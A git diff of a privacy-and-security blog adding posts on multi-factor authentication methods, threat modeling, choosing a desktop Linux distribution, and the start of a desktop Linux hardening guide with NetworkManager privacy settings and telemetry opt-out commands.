Unlike [WebAuthn](#fido2-fast-identity-online), TOTP offers no protection against [phishing](https://en.wikipedia.org/wiki/Phishing) or reuse attacks. If an adversary obtains a valid code from you, they may use it as many times as they like until it expires (generally 30 seconds + grace period).
|
||||
|
||||
Despite its short comings, we consider TOTP better and safer than Push Confirmations.
|
||||
|
||||
### Yubico OTP
|
||||
|
||||
Yubico OTP is an authentication protocol typically implemented in hardware security keys. When you decide to use Yubico OTP, the key will generate a public ID, private ID, and a Secret Key which is then uploaded to the Yubico OTP server.
|
||||
|
||||
When logging into a website, all you need to do is to physically touch the security key. The security key will emulate a keyboard and print out a one-time password into the password field.
|
||||
|
||||
The service will then forward the one-time password to the Yubico OTP server for validation. A counter is incremented both on the key and Yubico's validation server. The OTP can only be used once, and when a successful authentication occurs, the counter is increased which prevents reuse of the OTP. Yubico provides a [detailed document](https://developers.yubico.com/OTP/OTPs_Explained.html) about the process.
|
||||
|
||||

|
||||
|
||||
The Yubico validation server is a cloud based service, and you're placing trust in Yubico that their server won't be used to bypass your MFA or profile you. The public ID associated with Yubico OTP is reused on every website and could be another avenue for third-parties to profile you. Like TOTP, Yubico OTP does not provide phishing resistance.
|
||||
|
||||
Yubico OTP is an inferior protocol compared to TOTP since TOTP does not need trust in a third-party server and most security keys that support Yubico OTP (namely the Yubikey and OnlyKey) supports TOTP anyway. Yubico OTP is still better than Push Confirmation, however.
|
||||
|
||||
### FIDO2 (Fast IDentity Online)
|
||||
|
||||
[FIDO](https://en.wikipedia.org/wiki/FIDO_Alliance) includes a number of standards; first there was U2F and then later [FIDO2](https://en.wikipedia.org/wiki/FIDO2_Project) which includes the web standard [WebAuthn](https://en.wikipedia.org/wiki/WebAuthn).
|
||||
|
||||
U2F and FIDO2 refer to the [Client to Authenticator Protocol](https://en.wikipedia.org/wiki/Client_to_Authenticator_Protocol), which is the protocol between the security key and the computer, such as a laptop or phone. It complements WebAuthn which is the component used to authenticate with the website (the "Relying Party") you're trying to log in on.
|
||||
|
||||
WebAuthn is the most secure and private form of second factor authentication. While the authentication experience is similar to Yubico OTP, the key does not print out a one-time password and validate with a third-party server. Instead, it uses [public key cryptography](https://en.wikipedia.org/wiki/Public-key_cryptography) for authentication.
|
||||
|
||||
{{< youtube id="aMo4ZlWznao">}}
|
||||
|
||||
Since FIDO2/WebAuthn uses unique cryptographic keys with each internet site, a site pretending to be another one will not be able to get the correct response to the challenge for MFA, making FIDO2/Webauthn is invulnerable phising. It is also because of this authentication mechanism that a physical FIDO2 security key is not identifiable across different services like Yubico OTP. Even better, FIDO2 uses a counter for each authentication, which would help with detecting cloned keys.
|
||||
|
||||
If a website or service supports WebAuthn for the authentication, it is highly recommended that you use it over any other form of MFA.
|
||||
|
||||
## Notes
|
||||
|
||||
### Initial Set Up
|
||||
|
||||
When buying a security key, it is important that you change the default credentials, set up password protection for the key, and enable touch confirmation if your key supports it. Products such as the YubiKey have multiple interfaces with separate credentials for each one of them, so you should go over each interface and set up protection as well.
|
||||
|
||||
### Backups
|
||||
|
||||
You should always have backups for your MFA method. Hardware security keys can get lost, stolen, or simply stop working over time. It is recommended that you have a pair of hardware security keys with the same access to your accounts instead of just one.
|
||||
|
||||
When using TOTP with an authenticator app, be sure to back up your recovery keys to an offline and encrypted storage device.
|
||||
|
||||
### Weakest link
|
||||
|
||||
You are only as secure as the weakest authentication method you use. For instance, it makes little sense to add SMS 2FA as an alternative MFA method if you are already using FIDO2. An adversary who can compromise your SMS 2FA will get into your account just as easily as if you didn't use FIDO2 at all.
|
||||
|
||||
Thus, it is important to stick to the best authentication method you have access to. It is better to have 2 Yubikeys for FIDO2 than 1 FIDO2 key and one authenticator app for TOTP. Likewise, it is better to have 1 TOTP instance and a backup key than to use TOTP alongside with Email or SMS 2FA.
|
||||
|
||||
|
98
content/posts/knowledge/Threat Modeling.md
Normal file
98
content/posts/knowledge/Threat Modeling.md
Normal file
|
@ -0,0 +1,98 @@
|
|||
---
|
||||
title: "Threat Modeling"
|
||||
date: 2022-07-18
|
||||
tags: ['Knowledge base', 'Privacy', 'Security']
|
||||
author: Tommy
|
||||
---
|
||||
|
||||
The first task a person should do when taking steps to protect their privacy and security is to make a threat model.
|
||||
|
||||
## Defining a threat
|
||||
|
||||

|
||||
|
||||
To make a threat model, we must first define a threat. A common mistake made by people who are just getting into the privacy space is to define the threat as "big-tech companies." There is a fundamental problem with this definition:
|
||||
|
||||
Why are we not trusting "big-tech companies," but then shift our trust to "small-tech companies"? What happens if those "small-tech companies" turn out to be malicious? What happens when our favorite "small-tech company" becomes successful and grow exponentially? **The proper way to define the threat here is the "service provider," not "big-tech."**
|
||||
|
||||
Generally, there are four primary threats a person would want to protect themselves from:
|
||||
|
||||
- A service provider spying their users
|
||||
- Cross site/service tracking and data sharing, a.k.a. "mass surveillance"
|
||||
- An app developer spying on users through their malicious software
|
||||
- A hacker trying to get into the users' computers
|
||||
|
||||
A typical person would have several of these threats in their threat model. Some of these threats may weigh more than others. For example, a software developer would have a hacker stealing their source code, signing keys and secrets as their primary threat, but beyond that they would also want privacy from the websites they visit and so on. Likewise, an average Joe may have their primary threat as mass surveillance and service providers, but beyond that they also need to have decent security to prevent a hacker from stealing their data.
|
||||
|
||||
For whistleblowers, the threat model is much more extreme. Beyond what is mentioned above, they also need anonymity. Beyond just hiding what they do, what data they have, not getting hacked by hackers or governments, they also have to hide who they are.
|
||||
|
||||
## Privacy from service providers
|
||||
|
||||
In most setups, our "private" messages, emails, social interactions are typically stored on a server somewhere. The obvious problem with this is that the service provider (or a hacker who has compromised the server) can look into your "private" conversations whenever and however they want, without you ever knowing. This applies to many common services like SMS messaging, Telegram, Discord, and so on.
|
||||
|
||||
With end-to-end encryption, you can alleviate this issue by encrypting communications between you and your desired recipients before they are even sent to the server. The confidentiality of your messages is guaranteed, so long as the service provider does not have access to the private keys of either party.
|
||||
|
||||
In practice, the effectiveness of different end-to-end encryption implementations varies. Applications such as Signal run natively on your device, and every copy of the application is the same across different installations. If the service provider were to backdoor their application in an attempt to steal your private keys, that could later be detected using reverse engineering.
|
||||
|
||||
On the other hand, web-based end-to-end encryption implementations such as Proton Mail's webmail or Bitwarden's web vault rely on the server dynamically serving JavaScript code to the browser to handle cryptographic operations. A malicious server could target a specific user and send them malicious JavaScript code to steal their encryption key, and it would be extremely hard for the user to ever notice such a thing. Even if the user does notice the attempt to steal their key, it would be incredibly hard to prove that it is the provider trying to do so, because the server can choose to serve different web clients to different users.
|
||||
|
||||
Therefore, when relying on end-to-end encryption, you should choose to use native applications over web clients whenever possible.
|
||||
|
||||
Even with end-to-end encryption, service providers can still profile you based on **metadata**, which is typically not protected. While the service provider could not read your messages to see what you're saying, they can still observe things like who you're talking to, how often you message them, and what times you're typically active. Protection of metadata is fairly uncommon, and you should pay close attention to the technical documentation of the software you are using to see if there is any metadata minimization or protection at all, if that is a concern for you.
|
||||
|
||||
## Protection from cross site/service tracking
|
||||
|
||||
You can be tracked across websites and services using some form of identifiers. These are typically:
|
||||
|
||||
- Your IP address
|
||||
- Browser cookies
|
||||
- Your browser fingerprint
|
||||
- Data you submit to websites
|
||||
- Payment method correlation
|
||||
|
||||
Your goals should be to segregate your online identities from each other, to blend in with other people, and simply to avoid giving out identifying information to anyone as much as possible.
|
||||
|
||||
Instead of relying on privacy policies (which are promises that could be violated), try to obfuscate your information in such a way that it is very difficult for different providers to correlate data with each other and build a profile on you. This could come in the form of using encryption tools like Cryptomator prior to uploading your data to cloud services, using prepaid cards or cryptocurrency to protect your credit/debit card information, using a VPN to hide your IP address from websites and services on the internet, etc. The privacy policy should only be relied upon as a last resort, when you have exhausted all of your option for true privacy and need to put complete trust in your service provider.
|
||||
|
||||
Bear in mind that companies can hide their ownership or share your information with data brokers, even if they are not in the advertising business. Thus, it makes little sense to solely focus on the "ad-tech" industry as a threat in your threat model. Rather, it makes a lot more sense to protect yourself from service providers as a whole, and any kind of corporate surveillance threat that most people are concerned about will be thwarted along with the rest.
|
||||
|
||||
## Limiting Public Information
|
||||
|
||||
The best way to ensure your data is private is to simply not put it out there in the first place. Deleting information you find about yourself online is one of the best first steps you can take to regain your privacy.
|
||||
|
||||
On sites where you do share information, checking the privacy settings of your account to limit how widely that data is spread is very important. For example, if your accounts have a "private mode," enable it to make sure your account isn't being indexed by search engines and can't be viewed by people you don't vet beforehand.
|
||||
|
||||
If you have already submitted your real information to a number of sites which shouldn't have it, consider employing disinformation tactics such as submitting fictitious information related to the same online identity to make your real information indistinguishable from the false information.
|
||||
|
||||
## Protection from malware and hackers
|
||||
|
||||

|
||||
|
||||
You need security to obtain any semblance of privacy: **Using tools which appear private is futile if they could easily be exploited by attackers to release your data later.**
|
||||
|
||||
When it comes to application security, we generally do not (and sometimes cannot) know if the software that we use is malicious, or might one day become malicious. Even with the most trustworthy developers, there is generally no guarantee that their software does not have a serious vulnerability that could later be exploited.
|
||||
|
||||
To minimize the potential damage that a malicious piece of software can do, you should employ security by compartmentalization. This could come in the form of using different computers for different jobs, using virtual machines to separate different groups of related applications, or using a secure operating system with a strong focus on application sandboxing and mandatory access control.
|
||||
|
||||
Mobile operating systems are generally safer than desktop operating systems when it comes to application sandboxing. Apps cannot obtain root access and only have access to system resources which you grant them.
|
||||
|
||||
Desktop operating systems generally lag behind on proper sandboxing. ChromeOS has similar sandboxing properties to Android, and macOS has full system permission control and opt-in (for developers) sandboxing for applications, however these operating systems do transmit identifying information to their respective OEMs. Linux tends to not submit information to system vendors, but it has poor protection against exploits and malicious apps. This can be mitigated somewhat with specialized distributions which make heavy use of virtual machines or containers, such as Qubes OS.
|
||||
|
||||
Web browsers, email clients, and office applications all typically run untrusted code sent to you from third-parties. Running multiple virtual machines to separate applications like these from your host system as well as each other is one technique you can use to avoid an exploit in these applications from compromising the rest of your system. Technologies like Qubes OS or Microsoft Defender Application Guard on Windows provide convenient methods to do this seamlessly, for example.
|
||||
|
||||
If you are concerned about physical attacks you should use an operating system with a secure verified boot implementation, such as Android, iOS, ChromeOS, or macOS. You should also make sure that your drive is encrypted, and that the operating system uses a TPM or Secure [Enclave](https://support.apple.com/guide/security/secure-enclave-sec59b0b31ff/1/web/1) or [Secure Element](https://developers.google.com/android/security/android-ready-se) for rate limiting attempts to enter the encryption passphrase. You should avoid sharing your computer with people you don't trust, because most desktop operating systems do not encrypt data separately per-user.
|
||||
|
||||
## Bad Practices
|
||||
As a beginner, you may often fall into some bad practices while making a threat model. These include:
|
||||
|
||||
- Solely focusing on advertising networks instead of service providers as a whole
|
||||
- Heavy reliance on privacy policies
|
||||
- Blindly shifting trust from one service provider to another
|
||||
- Heavy reliance on badness enumeration for privacy instead of systematically solving the problem
|
||||
- Blindly trusting open-source software
|
||||
|
||||
As discussed, focusing solely on advertising networks and relying solely on privacy policies does not make up a sensible threat model. When switching away from a service provider, try to determine what the root problem is and see if your new provider has any technical solution to the problem. For example, you may not like Google Drive as it means giving Google access to all of your data. The underlying problem here is the lack of end to end encryption, which you can solve by using an encryption tool like Cryptomator or by switching to a provider who provides it out of the box like Proton Drive. Blindly switching from Google Drive to a provider who does not provide end to end encryption like the Murena Cloud does not make sense.
|
||||
|
||||
You should also keep in mind that [badness enumeration does not work, cannot work, has never worked, and will never work](/knowledge/badness-enumeration/). While things like ad blockers and antiviruses may help block the low hanging fruits, they can never fully protect you from the threat. On the other hand, they often increase your attack surface and are not worth the security sacrifice. At best, they are merely covenience tools and should not be thought of as part of a defense strategy.
|
||||
|
||||
Another thing to keep in mind is that open-source software is not automatically private or secure. Malicious code can be sneaked into the package by the developer of the project, contributors, library developers or the person who compiles the code. Beyond that, sometimes, a piece of open-source software may have worse security properties than its proprietary counterpart. An example of this would be traditional Linux desktops lacking verified boot, system integrity protection, or a full system access control for apps when compared to macOS. When doing threat modeling, it is vital that you evaluate the privacy and security properties of each piece of software being used, rather than just blindly trusting it because it is open-source.
|
7
content/posts/knowledge/_index.md
Normal file
7
content/posts/knowledge/_index.md
Normal file
|
@ -0,0 +1,7 @@
|
|||
---
|
||||
title: Knowledge Base
|
||||
ShowReadingTime: false
|
||||
ShowWordCount: false
|
||||
---
|
||||
|
||||
A collection of posts about general privacy and security knowledge
|
107
content/posts/linux/Choosing Your Desktop Linux Distribution.md
Normal file
107
content/posts/linux/Choosing Your Desktop Linux Distribution.md
Normal file
|
@ -0,0 +1,107 @@
|
|||
---
|
||||
title: "Choosing Your Desktop Linux Distribution"
|
||||
date: 2022-07-17
|
||||
tags: ['Operating Systems', 'Linux', 'Security']
|
||||
author: Tommy
|
||||
---
|
||||
|
||||
Not all Linux distributions are created equal. When choosing a Linux distribution, there are several things you need to keep in mind.
|
||||
|
||||
## Release Cycle
|
||||
|
||||
You should choose a distribution which stays close to the stable upstream software releases, typically rolling release distributions. This is because frozen release cycle distributions often don’t update package versions and fall behind on security updates.
|
||||
|
||||
For frozen distributions, package maintainers are expected to backport patches to fix vulnerabilities (Debian is one such [example](https://www.debian.org/security/faq#handling)) rather than bump the software to the “next version” released by the upstream developer. Some security fixes [do not](https://arxiv.org/abs/2105.14565) receive a [CVE](https://en.wikipedia.org/wiki/Common_Vulnerabilities_and_Exposures) (particularly less popular software) at all and therefore do not make it into the distribution with this patching model. As a result minor security fixes are sometimes held back until the next major release.
|
||||
|
||||
In fact, in certain cases, there have been vulnerabilities introduced by Debian because of their patching process. [Bug 1633467](https://bugzilla.mozilla.org/show_bug.cgi?id=1633467) and [DSA-1571](https://www.debian.org/security/2008/dsa-1571) are examples of this.
|
||||
|
||||

|
||||
|
||||
Holding packages back and applying interim patches is generally not a good idea, as it diverges from the way the developer might have intended the software to work. [Richard Brown](https://rootco.de/aboutme/) has a presentation about this:
|
||||
|
||||
{{< youtube id="i8c0mg_mS7U">}}
|
||||
|
||||
## Traditional and Atomic updates
|
||||
|
||||
Traditionally, Linux distributions update by sequentially updating the desired packages. Traditional updates such as those used in Fedora, Arch Linux, and Debian based distributions can be less reliable if an error occurs while updating.
|
||||
|
||||
Atomic updating distributions apply updates in full or not at all. Typically, transactional update systems are also atomic.
|
||||
|
||||
A transactional update system creates a snapshot that is made before and after an update is applied. If an update fails at any time (perhaps due to a power failure), the update can be easily rolled back to a “last known good state."
|
||||
|
||||
[Adam Šamalík](https://twitter.com/adsamalik) has a presentation with `rpm-ostree` in action:
|
||||
|
||||
{{< youtube id="-hpV5l-gJnQ">}}
|
||||
|
||||
Even if you are worried about the stability of the system because of regularly updated packages (which you shouldn't be), it makes more sense to use a system which you can safely update and rollback instead of an outdated distribution partially made up of unreliable backport packages without an easy rollback mechanism in case something goes wrong like Debian.
|
||||
|
||||
## Arch-based Distributions
|
||||
|
||||
Acrh Linux has very up to date packages with minimal downstream patching. That being said, Arch based distributions are not recommended for those new to Linux, regardless of the distribution. Arch does not have an distribution update mechanism for the underlying software choices. As a result you have to stay aware with current trends and adopt technologies as they supersede older practices on your own.
|
||||
|
||||
For a secure system, you are also expected to have sufficient Linux knowledge to properly set up security for their system such as adopting a [mandatory access control](https://en.wikipedia.org/wiki/Mandatory_access_control) system, setting up [kernel module](https://en.wikipedia.org/wiki/Loadable_kernel_module#Security) blacklists, hardening boot parameters, manipulating [sysctl](https://en.wikipedia.org/wiki/Sysctl) parameters, and knowing what components they need such as [Polkit](https://en.wikipedia.org/wiki/Polkit).
|
||||
|
||||
If you are experienced with Linux and wish to use an Arch-based distribution, you should use Arch Linux proper, not any of its derivatives. Here are some examples of why that is the case:
|
||||
|
||||
- **Manjaro**: This distribution holds packages back for 2 weeks to make sure that their own changes do not break, not to make sure that upstream is stable. When AUR packages are used, they are often built against the latest [libraries](https://en.wikipedia.org/wiki/Library_(computing)) from Arch’s repositories.
|
||||
- **Garuda**: They use [Chaotic-AUR](https://aur.chaotic.cx/) which automatically and blindly compiles packages from the AUR. There is no verification process to make sure that the AUR packages don’t suffer from supply chain attacks.
|
||||
|
||||
## Kicksecure
|
||||
|
||||
While you should not use outdated distributions like Debian, if you decide to use it, it would be a good idea to [convert](https://www.kicksecure.com/wiki/Debian) it into [Kicksecure](https://www.kicksecure.com/). Kicksecure, in oversimplified terms, is a set of scripts, configurations, and packages that substantially reduce the attack surface of Debian. It covers a lot of privacy and hardening recommendations by default.
|
||||
|
||||
## “Security-focused” Distributions
|
||||
|
||||
There is often some confusion about “security-focused” distributions and “pentesting” distributions. A quick search for “the most secure Linux distribution” will often give results like Kali Linux, Black Arch and Parrot OS. These distributions are offensive penetration testing distributions that bundle tools for testing other systems. They don’t include any “extra security” or defensive mitigations intended for regular use.
|
||||
|
||||
## Linux-libre Kernel and “Libre” Distributions
|
||||
|
||||
**Do not** use the Linux-libre kernel, since it [removes security mitigations](https://www.phoronix.com/scan.php?page=news_item&px=GNU-Linux-Libre-5.7-Released) and [suppresses kernel warnings](https://news.ycombinator.com/item?id=29674846) about vulnerable microcode for ideological reasons.
|
||||
|
||||
If you want to use one of these distributions for reasons other than ideology, you should make sure that they there is a way to easily obtain, install and update a proper kernel and missing firmware. For example, if you are looking to use [GUIX](https://guix.gnu.org/en/download/), you should absolutely use something like the [Nonguix](https://gitlab.com/nonguix/nonguix) repository and get all of the fixes as mentioned above.
|
||||
|
||||
## Wayland
|
||||
|
||||
You should use a desktop environment that supports the [Wayland](https://en.wikipedia.org/wiki/Wayland_(display_server_protocol)) display protocol as it developed with security [in mind](https://lwn.net/Articles/589147/). Its predecessor, [X11](https://en.wikipedia.org/wiki/X_Window_System), does not support GUI isolation, allowing all windows to [record screen, log and inject inputs in other windows](https://blog.invisiblethings.org/2011/04/23/linux-security-circus-on-gui-isolation.html), making any attempt at sandboxing futile. While there are options to do nested X11 such as [Xpra](https://en.wikipedia.org/wiki/Xpra) or [Xephyr](https://en.wikipedia.org/wiki/Xephyr), they often come with negative performance consequences and are not convenient to set up and are not preferable over Wayland.
|
||||
|
||||
Fortunately, common environments such as [GNOME](https://www.gnome.org), [KDE](https://kde.org), and the window manager [Sway](https://swaywm.org) have support for Wayland. Some distributions like Fedora and Tumbleweed use it by default, and some others may do so in the future as X11 is in [hard maintenance mode](https://www.phoronix.com/scan.php?page=news_item&px=X.Org-Maintenance-Mode-Quickly). If you’re using one of those environments it is as easy as selecting the “Wayland” session at the desktop display manager ([GDM](https://en.wikipedia.org/wiki/GNOME_Display_Manager), [SDDM](https://en.wikipedia.org/wiki/Simple_Desktop_Display_Manager)).
|
||||
|
||||
Try **not** to use desktop environments or window managers that do not have Wayland support such as Cinnamon (default on Linux Mint), Pantheon (default on Elementary OS), MATE, Xfce, and i3. If you are using i3, consider switching to [Sway](https://swaywm.org), which is a drop-in replacement with Wayland support as mentioned above.
|
||||
|
||||
## Recommended Distributions
|
||||
|
||||
Here is a quick non authoritative list of distributions that are generally better than others:
|
||||
|
||||
### Fedora Workstation
|
||||
|
||||

|
||||
|
||||
[Fedora Workstation](https://getfedora.org/en/workstation/) is a great general purpose Linux distribution, especially for those who are new to Linux. It is a semi-rolling release distribution. While some packages like GNOME are frozen until the next Fedora release, most packages (including the kernel) are updated frequently throughout the lifespan of the release. Each Fedora release is supported for one year, with a new version released every 6 months.
|
||||
|
||||
WIth that, Fedora generally adopts newer technologies before other distributions e.g., [Wayland](https://wayland.freedesktop.org/), [PipeWire](https://pipewire.org/), and soon, [FS-Verity](https://fedoraproject.org/wiki/Changes/FsVerityRPM). These new technologies often come with improvements in security, privacy, and usability in general.
|
||||
|
||||
While lacking transactional or atomic updates, Fedora's package manager, `dnf`, has a great rollback and undo feature that is generally missing from other package managers. You can read more about it on [Red Hat's documentation](https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/managing_software_with_the_dnf_tool/assembly_handling-package-management-history_managing-software-with-the-dnf-tool).
|
||||
|
||||
### Fedora Silverblue & Kinoite
|
||||
|
||||
[Fedora Silverblue](https://silverblue.fedoraproject.org/) and [Fedora Kinoite](https://kinoite.fedoraproject.org/) are immutable variants of Fedora with a strong focus on container workflows. Silverblue comes with the [GNOME](https://www.gnome.org/) desktop environment while Kinoite comes with [KDE](https://kde.org/). Silverblue and Kinoite follow the same release schedule as Fedora Workstation, benefiting from the same fast updates and staying very close to upstream.
|
||||
|
||||
You can refer to the video by [Adam Šamalík](https://twitter.com/adsamalik) linked [above](#traditional-and-atomic-updates) on how these distributions work.
|
||||
|
||||
### openSUSE Tumbleweed and MicroOS
|
||||
|
||||
Fedora Workstation and Silverblue's European counterpart. These are rolling release, fast updating distributions with [transactional update](https://kubic.opensuse.org/blog/2018-04-04-transactionalupdates/) using [Btrfs](https://en.wikipedia.org/wiki/Btrfs) and [Snapper](https://en.opensuse.org/openSUSE:Snapper_Tutorial).
|
||||
|
||||
[MicroOS](https://microos.opensuse.org/) has a much smaller base system than [Tumbleweed](https://get.opensuse.org/tumbleweed) and mounts the running BTRFS subvomumes as read-only (hence its name and why it is considered an immutable distribution). Currently, it is still in Beta so bugs are to be expected. Nevertheless, it is an awesome project.
|
||||
|
||||
{{< youtube id="jcl_4Vh6qP4">}}
|
||||
|
||||
### Whonix
|
||||
|
||||
[Whonix](https://www.whonix.org/) is a distribution focused on anonymity based on [Kicksecure](https://www.whonix.org/wiki/Kicksecure). It is meant to run as two virtual machines: a “Workstation” and a Tor “Gateway.” All communications from the Workstation must go through the Tor gateway. This means that even if the Workstation is compromised by malware of some kind, the true IP address remains hidden. It is currently the best solution that I know of if your threat model requires anonymity.
|
||||
|
||||
Some of its features include Tor Stream Isolation, [keystroke anonymization](https://www.whonix.org/wiki/Keystroke_Deanonymization#Kloak), [boot clock ranomization](https://www.kicksecure.com/wiki/Boot_Clock_Randomization), [encrypted swap](https://github.com/Whonix/swap-file-creator), hardened boot parameters, hardened kernel settings, and a [hardened memory allocator](https://www.kicksecure.com/wiki/Hardened_Malloc). One downside of Whonix is that it still inherits outdated packages with lots of downstream patching from Debian.
|
||||
|
||||
Future versions of Whonix will likely include [full system AppArmor policies](https://github.com/Whonix/apparmor-profile-everything) and a [sandbox app launcher](https://www.whonix.org/wiki/Sandbox-app-launcher) to fully confine all processes on the system.
|
||||
|
||||
Although Whonix is best used [in conjunction with Qubes](https://www.whonix.org/wiki/Qubes/Why_use_Qubes_over_other_Virtualizers), Qubes-Whonix has [various disadvantages](https://forums.whonix.org/t/qubes-whonix-security-disadvantages-help-wanted/8581) when compared to other hypervisors.
|
399
content/posts/linux/Desktop-Linux-Hardening.md
Normal file
399
content/posts/linux/Desktop-Linux-Hardening.md
Normal file
|
@ -0,0 +1,399 @@
|
|||
---
|
||||
title: "Desktop Linux Hardening"
|
||||
date: 2022-08-17
|
||||
tags: ['Operating Systems', 'Linux', 'Privacy', 'Security']
|
||||
author: Tommy
|
||||
---
|
||||
|
||||
Linux is [not](/posts/os/linux-insecurities) a secure operating system. However, there are steps you can take to harden it, reduce its attack surface and improve its privacy.
|
||||
|
||||
**Before We Start**...
|
||||
|
||||
This guide is largely based on [Madaidan's Linux hardening guide](https://madaidans-insecurities.github.io/guides/linux-hardening.html); however, it does take into account usability and ease of maintenance of each recommendation. The goal is to produce a guide that intermediate to advanced Linux users can reasonably follow to set up and maintain the security configurations. It will also **not** try to be distribution agnostic, and there will be many distribution specific recommendations.
|
||||
|
||||
Some of the sections will include mentions of unofficial builds of packages like `linux-hardened`, `lkrg-akmod`, `hardend-malloc`, and so on. These are not endorsements. They are merely there to show you that you have an option to easily obtain and update these packages. Using unofficial builds of packages means adding more parties to trust, and you have to evaluate whether it is worth doing so for the potential privacy or security benefits or not.
|
||||
|
||||

|
||||
|
||||
## During Installation
|
||||
|
||||
### Drive Encryption
|
||||
|
||||
Most Linux distributions have an option within its installer for enabling [LUKS](../encryption.md#linux-unified-key-setup) full disk encryption. If this option isn’t set at installation time, you will have to backup your data and re-install, as encryption is applied after [disk partitioning](https://en.wikipedia.org/wiki/Disk_partitioning), but before [file systems](https://en.wikipedia.org/wiki/File_system) are formatted.
|
||||
|
||||
### Encrypted Swap
|
||||
|
||||
Consider using [encrypted swap](https://wiki.archlinux.org/title/Dm-crypt/Swap_encryption) or [ZRAM](https://wiki.archlinux.org/title/Swap#zram-generator) instead of unencrypted swap to avoid potential security issues with sensitive data being pushed to [swap space](https://en.wikipedia.org/wiki/Memory_paging). While ZRAM can be set up post-installation, if you want to use encrypted swap, you should set it up while partitioning your drive.
|
||||
|
||||
Depending on your distribution, encrypted swap may be automatically set up if you choose to encrypt your drive. Fedora [uses ZRAM by default](https://fedoraproject.org/wiki/Changes/SwapOnZRAM), regardless of whether you enable drive encryption or not.
|
||||
|
||||
## Privacy Tweaks
|
||||
|
||||
### NetworkManager Trackability Reduction
|
||||
|
||||
Most desktop Linux distributions including Fedora, openSUSE, Ubuntu, and so on come with [NetworkManager](https://en.wikipedia.org/wiki/NetworkManager) by default to configure Ethernet and Wi-Fi settings.
|
||||
|
||||
WfKe9vLwSvv7rN has detailed guide on [trackability reduction with NetworkManager](/posts/os/networkmanager-trackability-reduction/) and I highly recommend that you check it out.
|
||||
|
||||
In short, if you use NetworkManager, add the following to your `/etc/NetworkManager/conf.d/00-macrandomize.conf`:
|
||||
```
|
||||
[device]
|
||||
wifi.scan-rand-mac-address=yes
|
||||
|
||||
[connection]
|
||||
wifi.cloned-mac-address=random
|
||||
ethernet.cloned-mac-address=random
|
||||
```
|
||||
|
||||
Next, disable transient hostname management by adding the following to your `/etc/NetworkManager/conf.d/01-transient-hostname.conf`:
|
||||
|
||||
```
|
||||
[main]
|
||||
hostname-mode=none
|
||||
```
|
||||
|
||||
Then, restart your NetworkManager service:
|
||||
|
||||
```bash
|
||||
sudo systemctl restart NetworkManager
|
||||
```
|
||||
|
||||
Finally, set your hostname to `localhost`:
|
||||
|
||||
```bash
|
||||
sudo hostnamectl hostname "localhost"
|
||||
```
|
||||
|
||||
Note that randomizing Wi-Fi MAC addresses depends on support from the Wi-Fi card firmware.
|
||||
|
||||
### Other Identifiers
|
||||
|
||||
There are other system identifiers which you may wish to be careful about. You should give this some thought to see if it applies to your [threat model](/posts/knowledge/threat-modeling/):
|
||||
|
||||
- **Usernames:** Similarly, your username is used in a variety of ways across your system. Consider using generic terms like "user" rather than your actual name.
|
||||
- **Machine ID:**: During installation a unique machine ID is generated and stored on your device. Consider [setting it to a generic ID](https://madaidans-insecurities.github.io/guides/linux-hardening.html#machine-id).
|
||||
|
||||
### System Counting
|
||||
|
||||
Many Linux distributions sends some telemetry data by default to count how many systems are using their software. Consider disabling this depending on your threat model.
|
||||
|
||||
The Fedora Project does this by [counting](https://fedoraproject.org/wiki/Changes/DNF_Better_Counting) how many unique systems access its mirrors by using a [`countme`](https://fedoraproject.org/wiki/Changes/DNF_Better_Counting#Detailed_Description) variable instead of a unique ID.
|
||||
|
||||
This [option](https://dnf.readthedocs.io/en/latest/conf_ref.html#options-for-both-main-and-repo) is currently off by default. However, you could add `countme=false` to `/etc/dnf/dnf.conf` just in case it is enabled in the future. On systems that use rpm-ostree such as Fedora Silverblue or Kinoite, the `countme` option can be disabled by masking the [rpm-ostree-countme](https://fedoramagazine.org/getting-better-at-counting-rpm-ostree-based-systems/) timer.
|
||||
|
||||
openSUSE uses a [unique ID](https://en.opensuse.org/openSUSE:Statistics) to count systems, which can be disabled by deleting the `/var/lib/zypp/AnonymousUniqueId` file.
|
||||
|
||||
Zorin OS uses the `zorin-os-cencus` package, which also uses a [unique ID](https://zorin.com/legal/privacy/) to count systems. You can opt out of this by doing `sudo apt purge zorin-os-census`, and optionally hold it with `sudo apt-mark hold zorin-os-census` to avoid accidentally installing it in the future.
|
||||
|
||||
[Snapd](https://github.com/snapcore/snapd) assigns a [unique ID](https://snapcraft.io/docs/snap-store-metrics) to your snapd installation and use it for telemetry. While this is generally not a problem, if your threat model calls for anonymity, you should not be using snap packages, and you should remove snapd from your Ubuntu installation. Like with Zorin Census, on Debian based distributions, and especially Ubuntu, consider holding `snapd` with `sudo apt-mark hold snapd`.
|
||||
|
||||
Of course, this is a non-exhaustive list of how different Linux distributions do this. If you are aware of any other tracking mechanisms that different distributions use, feel free to make a [pull request](https://github.com/PrivSec-dev/privsec.dev/blob/main/content/posts/linux/Linux-Desktop-Hardening.md) or [discussion post](https://github.com/PrivSec-dev/privsec.dev/discussions) detailing them!
|
||||
|
||||
### Keystroke Anonymization
|
||||
You could be [fingerprinted based on soft biometric traits](https://www.whonix.org/wiki/Keystroke_Deanonymization) when you use the keyboard. The [Kloak](https://github.com/vmonaco/kloak) package could help you mitigate this threat. It is available as a .deb package from [Kicksecure's repository](https://www.kicksecure.com/wiki/Packages_for_Debian_Hosts) and an [AUR package](https://aur.archlinux.org/packages/kloak-git).
|
||||
|
||||
With that being said, if your threat model calls for using something like Kloak, you are probably better off just using Whonix.
|
||||
|
||||
## Application Confinement
|
||||
Some sandboxing solutions for desktop Linux distributions do exist; however, they are not as strict as those found in macOS or ChromeOS. Applications installed from the package manager (`dnf`, `apt`, etc.) typically have **no** sandboxing or confinement whatsoever. Below are a few projects that aim to solve this problem:
|
||||
|
||||
### Flatpak
|
||||
|
||||
{{< youtube id="GkgPIJp8_30">}}
|
||||
|
||||
[Flatpak](https://flatpak.org) aims to be a universal package manager for Linux. One of its main goals is to provide a universal package format which can be used in most Linux distributions. It provides some [permission control](https://docs.flatpak.org/en/latest/sandbox-permissions.html). With that being said, Flatpak sandboxing is [quite weak](https://madaidans-insecurities.github.io/linux.html#flatpak).
|
||||
|
||||
